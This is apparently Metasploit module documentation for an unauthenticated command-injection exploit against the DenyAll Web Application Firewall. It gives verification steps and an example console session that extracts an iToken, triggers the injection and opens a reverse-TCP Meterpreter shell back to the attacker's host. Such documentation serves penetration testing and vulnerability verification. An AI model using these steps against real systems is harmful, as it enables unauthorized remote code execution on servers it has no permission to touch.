## Vulnerable Application

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.

It's possible to have trial demo for 15 days at Amazon Marketplace.
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)

You just need to follow instruction above URL.

## Verification Steps

A successful check of the exploit will look like this:

- [ ] Start `msfconsole`
- [ ] `use use exploit/linux/http/denyall_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `iToken` value extraction.
- [ ] **Verify** that you are getting `meterpreter` session.

## Scenarios

```
msf > use exploit/linux/http/denyall_exec 
msf exploit(denyall_exec) > 
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit 

[*] Started reverse TCP handler on 35.12.3.3:4444 
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Triggering command injection vulnerability with  iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```